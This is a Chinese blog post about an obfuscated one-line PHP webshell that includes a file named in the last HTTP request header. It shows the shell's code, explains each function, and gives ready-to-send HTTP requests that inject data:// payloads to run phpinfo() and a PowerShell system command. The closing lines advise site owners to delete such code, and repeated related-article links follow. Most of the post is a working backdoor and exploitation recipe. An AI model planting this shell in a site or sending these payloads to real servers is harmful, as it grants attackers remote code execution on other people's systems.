一个有意思的PHP Webshell，利用伪协议执行代码

wptr33 2025-05-02 13:48 4 浏览

前不久，在网上看到过一个变形的PHP的webshell，非常有意思，利用的是伪协议来执行代码或命令。

这个PHP的webshell是如何写的呢？代码如下：

<?php
require_once(end(apache_request_headers()));

我来解释一下这段代码的几个函数：

1. apache_request_headers()

作用：获取当前 HTTP 请求的所有请求头（headers），返回一个关联数组，例如：

<PHP>
[
"Host" => "example.com",
"User-Agent" => "Mozilla/5.0",
"Accept" => "text/html",
"X-Malicious-Header" => "evil.php" // 攻击者可控的 header
]

2. end()

作用：返回数组的最后一个元素的值。例如：

<PHP>

$headers = ["Host" => "example.com", "X-Header" => "hack.php"];

echo end($headers); // 输出 "hack.php"

3. require_once()

作用：加载并执行指定的 PHP 文件。如果文件路径可控，攻击者可以包含任意文件（包括远程文件）。

如果实现攻击呢？我们只要在发送包里发送恶意代码就可以了，前提是php.ini里的allow_url_include要打开。

我们发送如下代码就可以了，111.php就是有以上代码的文件了。我们本机用Yakit测试一下：

GET /111.php HTTP/1.1
rce: data://text/plain,<?php phpinfo();?>
Host: 127.0.0.1

执行命令发送如下包就可以了：

GET /111.php HTTP/1.1
rce:data://text/plain,<?php system("powershell -c \"Get-LocalUser\"");?>
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

如果你网站服务器看到有这样一段代码，就立马删掉吧。如果你是渗透测试人员，如何想更好利用，多学点PHP代码就可以了。

php 删除文件

上一篇：PHP8中删除数组中的重复元素-PHP8知识详解
下一篇：php宝塔搭建部署thinkphp红色大气装修公司官网php源码

一个有意思的PHP Webshell，利用伪协议执行代码

相关推荐

C# 13 和 .NET 9 全知道 :13 使用 ASP.NET Core 构建网站 (1)

因果推断Matching方式实现代码因果推断模型

git pull命令使用实例 git pull--rebase

git fetch 和git pull 的异同 git中fetch和pull的区别

git pull 和git fetch 命令分别有什么作用?二者有什么区别?

面试官:git pull是哪两个指令的组合?

git 执行pull错误如何撤销 git pull fail

git pull 之后本地代码被覆盖解决方案

还可以这样玩?Git基本原理及各种骚操作，涨知识了

git命令之pull git.pull

一个有意思的PHP Webshell，利用伪协议执行代码

相关推荐

C# 13 和 .NET 9 全知道 :13 使用 ASP.NET Core 构建网站 (1)

因果推断Matching方式实现代码 因果推断模型

git pull命令使用实例 git pull--rebase

git fetch 和git pull 的异同 git中fetch和pull的区别

git pull 和git fetch 命令分别有什么作用?二者有什么区别?

面试官:git pull是哪两个指令的组合?

git 执行pull错误如何撤销 git pull fail

git pull 之后本地代码被覆盖 解决方案

还可以这样玩?Git基本原理及各种骚操作，涨知识了

git命令之pull git.pull

因果推断Matching方式实现代码因果推断模型

git pull 之后本地代码被覆盖解决方案